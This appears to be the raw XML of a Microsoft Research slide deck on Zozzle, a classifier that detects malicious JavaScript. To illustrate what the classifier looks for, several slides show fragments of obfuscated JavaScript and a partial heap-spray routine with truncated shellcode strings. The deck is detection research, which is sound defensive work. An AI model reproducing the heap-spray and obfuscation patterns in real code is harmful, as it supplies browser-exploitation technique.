    <dgm:cxn modelId="{D085C5D7-8773-448C-BD7C-4FE9E3C253D0}" type="presParOf" srcId="{156D6958-CA0C-4771-8995-A8FD54E2611B}" destId="{9A7BC57E-D939-4D34-8784-E6F2F3287A55}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{746B8DED-CB43-4192-93F2-8BEDE68DABA9}" type="presParOf" srcId="{9A7BC57E-D939-4D34-8784-E6F2F3287A55}" destId="{EAE03124-41EA-4922-BC2C-9DB8EDBAB9FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{459997C1-E971-4CB9-B8FC-3BE5B5A4EA11}" type="presParOf" srcId="{9A7BC57E-D939-4D34-8784-E6F2F3287A55}" destId="{8149831E-0CC5-4317-879F-9A33CDC579A9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BD73CC9B-C407-494E-9563-17572017B396}" type="presParOf" srcId="{156D6958-CA0C-4771-8995-A8FD54E2611B}" destId="{CEF92812-F49D-4A0C-B5F0-1E8B6E24C526}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2535A167-7018-4B70-BC06-5C053E65F6BC}" type="presParOf" srcId="{156D6958-CA0C-4771-8995-A8FD54E2611B}" destId="{ED81C2A6-4CF5-4BAF-8D63-C6C6BC2AC88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D0628-525F-423E-BE4C-C96693712918}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9/1/2011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9D1C8-AAC4-4012-9D8F-9ECA2B63A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0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725A-DAAC-4B91-ADDA-EBC7AE200B96}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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1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04CE-8B9B-4DB4-B3E9-28A3D44F0CD6}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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8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082F-B358-4EA4-B1EB-339BB72E863A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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1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24A1-F1AF-4A89-BB64-4F32AA5B30ED}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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D14E9-3AB9-49D2-A3B2-4FCF1D75777E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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D730D-DFEB-4347-B94E-BA100D1DBEB3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2011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30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18C2-7D30-402F-AB30-CEC1FD68CDBD}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2011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5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30C7-D7AD-4293-A0DF-29438FD2FC97}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2011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3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E1A2-2C00-42A1-83E8-9D06A4D87DBE}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2011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470FB-3867-4271-A5E0-0DF7197FFE2D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2011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6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D32D5-B4CF-48F4-95BE-179844780380}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2011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74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D699D-5E85-45DD-A655-84007AC232D5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2011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6626B-2CA8-4A5D-B1ED-3706ED9891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0"/>
            <a:ext cx="1524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3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8" r="7392"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="785323"/>
            <a:ext cx="4772167" cy="607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1550"/>
            <a:ext cx="8153400" cy="1771650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/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Zozzle: Finding Malware </a:t>
            </a:r>
            <a:b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on a Web Scale</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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05600" y="3200400"/>
            <a:ext cx="2216626" cy="2057400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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Ben Livshits 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Microsoft Research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Redmond, WA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 14" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZSOAFU22\MC90029086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3137768" cy="3230578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" sx="143000" sy="14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410200" y="5364178"/>
            <a:ext cx="35052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with Ben Zorn, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1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Christian Seifert, Charlie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1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Curtsinger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean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8900000">
            <a:off x="6001027" y="385649"/>
            <a:ext cx="1395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ndy" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Andy" pitchFamily="66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10300" y="1143000"/>
            <a:ext cx="285750" cy="228600"/>
            <a:chOff x="6210300" y="914400"/>
            <a:chExt cx="285750" cy="2286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210300" y="990600"/>
              <a:ext cx="114300" cy="1243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324600" y="914400"/>
              <a:ext cx="171450" cy="228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Encode This Intuition?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 descr="http://www.joblo.com/movie-posters/images/full/2002-signs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2578688" cy="381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573665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*but without Mel Gibson…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42688" y="1371600"/>
            <a:ext cx="4166616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 smtClean="0"/>
              <a:t>Obfuscated variable names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Variables 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payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, 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spray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nopsled</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas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/>
              <a:t>Many loops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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> and 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delete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ActiveX controls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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String.fromChar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"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6019800"/>
            <a:ext cx="38862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43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dirty="0" smtClean="0"/>
              <a:t>Plan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Train </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>classifier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>recognize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>alware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Start with thousands of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> labeled samples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Classify JavaScript code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1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ular Callout 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1447800"/>
            <a:ext cx="4038600" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst/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OlOlll=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"(x)"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OllOlO=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 String"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OlllOO=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"tion"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OlOllO=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"Code(x)}"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OllOOO=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"Char"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OlllOl=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"func"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OllllO=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 l = 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OllOOl=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".from"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OllOll=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"{return"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Olllll=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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"var"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6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(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);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Obfuscation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648200" y="1600201"/>
            <a:ext cx="4038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300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l =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function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(x)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String.fromCharCode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(x);</a:t>
            </a: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3429000"/>
            <a:ext cx="4191000" cy="3124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shellcode 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unescape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"%u54EB%u758B…"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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="13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unescape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"%u0c0c%u0c0c"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while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bigblock.length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slackspace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+=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block =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bigblock.substring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bigblock.length-slackspace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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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while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block.length+slackspace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0x40000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block = block + block +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fillblock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memory =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Array(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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(x=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 x&lt;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300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; x++) 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memory[x] = block + shellcode; </a:t>
            </a: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33CA-B356-49D5-A97B-A5F72900BA3A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10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="2514600"/>
            <a:ext cx="4038600" cy="838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3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O =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function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(m){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String.fromCharCode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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="13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300" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Math.floor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(m / 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10000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 / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="13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3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3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1" name="Picture 5" descr="C:\Users\zorn\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YCXYHT46\j0432599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486400"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1447800"/>
            <a:ext cx="4038600" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst/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l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(50)+l(41)+l(59)+l(125));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533400" y="1447800"/>
            <a:ext cx="4038600" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallou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pt-BR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
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</a: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27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1" grpId="0" build="p"/>
      <p:bldP spid="13" grpId="0" build="p"/>
      <p:bldP spid="8" grpId="0" build="p"/>
      <p:bldP spid="7" grpId="0" animBg="1"/>
      <p:bldP spid="7" grpId="1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dirty="0" smtClean="0"/>
              <a:t>Plan (revised)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Train </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>classifier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>recognize malware</a:t>
            </a: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obfuscated code = malicious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8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Obfuscated? Yes. Malicious, no.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5962"/>
            <a:ext cx="8229600" cy="3314438"/>
          </a:xfr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2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Highly Obfuscated != Malicious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42" y="1600200"/>
            <a:ext cx="7054516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dirty="0" smtClean="0"/>
              <a:t>Plan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>revised and improved)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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/>
              <a:t>Deobfuscate (unfold the code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r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Then classify</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4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9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rot="10800000">
            <a:off x="3393473" y="4536265"/>
            <a:ext cx="289560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Runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Deobfuscation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> via Code Unfolding)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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33CA-B356-49D5-A97B-A5F72900BA3A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld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1047750" y="2164749"/>
            <a:ext cx="2209800" cy="2838032"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20833"/>
              <a:gd name="adj2" fmla="val 56794"/>
            </a:avLst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0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pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
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</a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean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Picture 5" descr="C:\Users\zorn\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YCXYHT46\j0432599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0778" y="5201728"/>
            <a:ext cx="741872" cy="741872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6439414" y="2821765"/>
            <a:ext cx="1713986" cy="220980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JavaScript runtime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</a:rPr>
              <a:t>in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browser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46438" y="3040840"/>
            <a:ext cx="1752600" cy="762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Deobfuscator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393473" y="3202765"/>
            <a:ext cx="45720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829814" y="3202765"/>
            <a:ext cx="45720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06959" y="2431240"/>
            <a:ext cx="2077479" cy="2421748"/>
            <a:chOff x="3127288" y="4106474"/>
            <a:chExt cx="2077479" cy="2421748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="Rectangular Callout 95"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3127288" y="4106474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7" name="Rectangular Callout 96"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4252267" y="4106474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8" name="Rectangular Callout 97"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3127288" y="5499731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99" name="Rectangular Callout 98"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4252267" y="5499731"/>
              <a:ext cx="952500" cy="1028491"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -31833"/>
                <a:gd name="adj2" fmla="val 74391"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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pt-BR" sz="300" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eval</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="300" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
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</a:r>
              <a:endParaRPr lang="en-US" sz="300" dirty="0" smtClean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16459" y="2073626"/>
            <a:ext cx="2342120" cy="3020277"/>
            <a:chOff x="3590410" y="3057525"/>
            <a:chExt cx="2342120" cy="3020277"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="100" name="Group 99"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4807551" y="3057525"/>
              <a:ext cx="1124979" cy="1393257"/>
              <a:chOff x="3200400" y="4048125"/>
              <a:chExt cx="2077479" cy="2421748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="101" name="Rectangular Callout 100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2" name="Rectangular Callout 101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3" name="Rectangular Callout 102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4" name="Rectangular Callout 103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3590410" y="3086100"/>
              <a:ext cx="1124979" cy="1393257"/>
              <a:chOff x="3200400" y="4048125"/>
              <a:chExt cx="2077479" cy="2421748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="106" name="Rectangular Callout 105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7" name="Rectangular Callout 106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8" name="Rectangular Callout 107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09" name="Rectangular Callout 108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3590410" y="4684545"/>
              <a:ext cx="1124979" cy="1393257"/>
              <a:chOff x="3200400" y="4048125"/>
              <a:chExt cx="2077479" cy="2421748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="111" name="Rectangular Callout 110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2" name="Rectangular Callout 111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3" name="Rectangular Callout 112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4" name="Rectangular Callout 113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4800600" y="4684545"/>
              <a:ext cx="1124979" cy="1393257"/>
              <a:chOff x="3200400" y="4048125"/>
              <a:chExt cx="2077479" cy="2421748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="116" name="Rectangular Callout 115"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3200400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7" name="Rectangular Callout 116"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4325379" y="4048125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8" name="Rectangular Callout 117"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3200400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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="119" name="Rectangular Callout 118"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4325379" y="5441382"/>
                <a:ext cx="952500" cy="1028491"/>
              </a:xfrm>
              <a:prstGeom prst="wedgeRectCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val -31833"/>
                  <a:gd name="adj2" fmla="val 74391"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:soli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pt-BR" sz="100" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>eval</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="100" dirty="0" smtClean="0">
                    <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
    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    </a:r>
                <a:endParaRPr lang="en-US" sz="100" dirty="0" smtClean="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68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Zozzle Training &amp; Application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372287" y="5093656"/>
            <a:ext cx="1676786" cy="1764344"/>
            <a:chOff x="5410200" y="956449"/>
            <a:chExt cx="3604923" cy="2842010"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 5" descr="http://www.applewooddata.co.uk/Images/Server%20Farm%20front%20Veiw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956449"/>
              <a:ext cx="2988313" cy="2096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5" descr="http://userlogos.org/files/logos/Rog/bing.com_0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3872" y="2461350"/>
              <a:ext cx="2111251" cy="1337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ttp://ts1.mm.bing.net/images/thumbnail.aspx?q=958006756880&amp;id=03630b615590ca612b2c56d882091a27&amp;url=http%3a%2f%2fwww.techmagnews.com%2fwp-content%2fuploads%2fimages%2fFacebook_No_Longer_Supports_Internet_Explorer_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35" y="5232076"/>
            <a:ext cx="945649" cy="102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828800" y="1634244"/>
            <a:ext cx="2914476" cy="1876530"/>
            <a:chOff x="1828800" y="1634244"/>
            <a:chExt cx="2914476" cy="1876530"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2052" name="Picture 4" descr="http://www.asia.ru/images/target/photo/51643579/Watering_Ca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1178">
              <a:off x="2870759" y="2190608"/>
              <a:ext cx="1872517" cy="132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828800" y="1634244"/>
              <a:ext cx="1238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 malicious samples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(1K)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50024" y="1604435"/>
            <a:ext cx="2941426" cy="1758113"/>
            <a:chOff x="4850024" y="1604435"/>
            <a:chExt cx="2941426" cy="1758113"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2050" name="Picture 2" descr="http://t1.gstatic.com/images?q=tbn:ANd9GcSN9DPnh2MvOKNOVH4jP7D4bOiGgiIgZvfuxghPcqjs06oWZwW1O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13238">
              <a:off x="4850024" y="1752600"/>
              <a:ext cx="1826394" cy="1609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553200" y="1604435"/>
              <a:ext cx="1238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 benign samples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(7K)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76600" y="3709797"/>
            <a:ext cx="2743200" cy="1232579"/>
            <a:chOff x="3276600" y="3709797"/>
            <a:chExt cx="2743200" cy="1232579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709797"/>
              <a:ext cx="1778288" cy="1232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437" y="3790269"/>
              <a:ext cx="899363" cy="10716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51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Hierarchical Feature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extraction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33CA-B356-49D5-A97B-A5F72900BA3A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld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094205" y="2054809"/>
            <a:ext cx="1066800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function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91200" y="3047468"/>
            <a:ext cx="1066800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loop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860722" y="4112209"/>
            <a:ext cx="1225378" cy="6096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shellcode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825578" y="300936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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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311096" y="4112209"/>
            <a:ext cx="1066800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string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90800" y="5102809"/>
            <a:ext cx="1450889" cy="6096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%u0c0c%u0909…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23" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="2"/>
            <a:endCxn id="20" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3511378" y="2664409"/>
            <a:ext cx="1116227" cy="68785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1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4627605" y="2664409"/>
            <a:ext cx="1163595" cy="68785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3"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2473411" y="3594735"/>
            <a:ext cx="452600" cy="5174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5"/>
            <a:endCxn id="21" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3410945" y="3594735"/>
            <a:ext cx="433551" cy="5174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2"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3316245" y="4721809"/>
            <a:ext cx="528251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419600" y="5102809"/>
            <a:ext cx="1225378" cy="60960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memory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81700" y="4036009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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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0" name="Straight Arrow Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="29" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="3657068"/>
            <a:ext cx="0" cy="37894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9" idx="3"/>
            <a:endCxn id="28" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5032289" y="4621376"/>
            <a:ext cx="1049844" cy="48143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7392246" y="5102809"/>
            <a:ext cx="1225378" cy="609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block</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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3" name="Straight Arrow Connector 32"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="5"/>
            <a:endCxn id="32" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6567067" y="4621376"/>
            <a:ext cx="1437868" cy="48143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ular Callout 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3048451"/>
            <a:ext cx="2339803" cy="365074"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 26056"/>
              <a:gd name="adj2" fmla="val 1146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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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unction:shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Rectangular Callout 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2434820" y="4060430"/>
            <a:ext cx="2346730" cy="365074"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8256"/>
              <a:gd name="adj2" fmla="val 2305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string:%u0c0c%u0909…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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8" name="Rectangular Callout 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
